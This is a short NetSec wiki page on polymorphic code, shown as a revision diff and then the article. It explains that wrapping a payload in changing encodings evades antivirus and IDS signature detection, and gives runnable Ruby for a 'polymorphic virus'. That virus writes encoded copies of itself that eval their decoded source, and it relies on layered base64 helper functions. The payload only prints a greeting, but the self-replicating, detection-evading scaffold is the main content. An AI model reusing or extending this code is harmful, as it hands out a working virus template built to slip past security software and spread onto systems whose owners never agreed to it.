Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "Polymorphic"
From NetSec
Gonzalo58T (Talk | contribs) |
Gonzalo58T (Talk | contribs) (→md.rb (utility functions)) |
||
| Line 55: | Line 55: | ||
== md.rb (utility functions) == | == md.rb (utility functions) == | ||
<pre> | <pre> | ||
| − | + | require 'base64'; | |
| − | if (!defined?( | + | if (!defined?(MD_LOADED)) |
| − | + | def deterministicKeygen(theKey) | |
| + | r = Random.new(theKey.to_i); | ||
| + | return r.rand(3)+3; | ||
end | end | ||
| − | + | def mencrypt(str, theKey) | |
| − | + | k = deterministicKeygen(theKey) | |
| − | def | + | k.times do |
| − | + | str = Base64.encode64(str) | |
| − | + | end | |
| − | + | return str | |
| − | + | end | |
| − | + | def mdecrypt(str, theKey) | |
| − | + | k = deterministicKeygen(theKey) | |
| − | + | k.times do | |
| − | + | str = Base64.decode64(str) | |
| − | + | end | |
| − | + | return str | |
| − | + | ||
| − | + | ||
| − | + | ||
| − | + | ||
| − | + | ||
| − | + | ||
end | end | ||
| − | + | MD_LOADED=true | |
| − | + | end | |
| − | + | ||
| − | + | ||
| − | + | ||
| − | + | ||
| − | + | ||
| − | + | ||
</pre> | </pre> | ||
Revision as of 22:26, 9 November 2011
| This article contains too little information, it should be expanded or updated. |
|---|
Things you can do to help:
|
Adj. referring to self-modifying code.
Contents
[hide]Reasons to write polymorphic code
The main reason to write polymorphic code is to avoid being hashwise identified, or to have code signature detected, i.e. an IDS or anti-virus software will not identify the payload as it is nicely wrapped-up in an encrypted form. Another reason is to propagate it to multiple copies without having the same signature.
Techniques of polymorphic code writing
- Define a stackable set of encrypting/decrypting functions, preferrably working with an encryption key. Let's call these sets d and e (decryption / encryption), and let there be two integers n, m, n > m so that d[n](d[n-1](...(d[m](e[n](e[n-1](...e[m](code))...) == code
Note: you can write a single function or pair of functions and have them vary with a series of keys (outputted by a deterministic key generator ideally), as long as your encryption remains revertable.
- Write your payload code (that you want dissimulated). At the end of this code put some bootstrap that will decrypt and run the code (in PHP/ruby/perl/whatnot, eval it, in C, smash the stack with it, in C#, use reflection). At the beginning of your payload code, call for your encryption/duplication code.
Example in Ruby
pv.rb (polymorphic virus)
#!/usr/bin/env ruby1.9.1
if (!defined?(FILE))
FILE=File.basename(__FILE__)
end
load "md.rb";
#require "FileUtils"
def selfCopy(key)
code = ""
newkey = deterministicKeygen(key);
File.open(FILE, "r").each_line do |l|
code += l
end
code = mencrypt(code, key)
# define new file name
fn = rand(128).to_s + 'copy.rb';
File.open(fn, 'w+') do |f|
f.write('load "md.rb";'+"\n");
# this is needed because __FILE__ isn't to be found in eval
f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n");
f.write('code="'+code+'";'+"\n")
f.write('eval(mdecrypt(code, ' + key.to_s+'))');
end
return newkey
end
# initial key is 42, D.A. told me
key = 42
# malicious section
# first, replicate
key = selfCopy(key)
# then do evil!
puts "Hello, it's savitri"
md.rb (utility functions)
require 'base64';
if (!defined?(MD_LOADED))
def deterministicKeygen(theKey)
r = Random.new(theKey.to_i);
return r.rand(3)+3;
end
def mencrypt(str, theKey)
k = deterministicKeygen(theKey)
k.times do
str = Base64.encode64(str)
end
return str
end
def mdecrypt(str, theKey)
k = deterministicKeygen(theKey)
k.times do
str = Base64.decode64(str)
end
return str
end
MD_LOADED=true
end
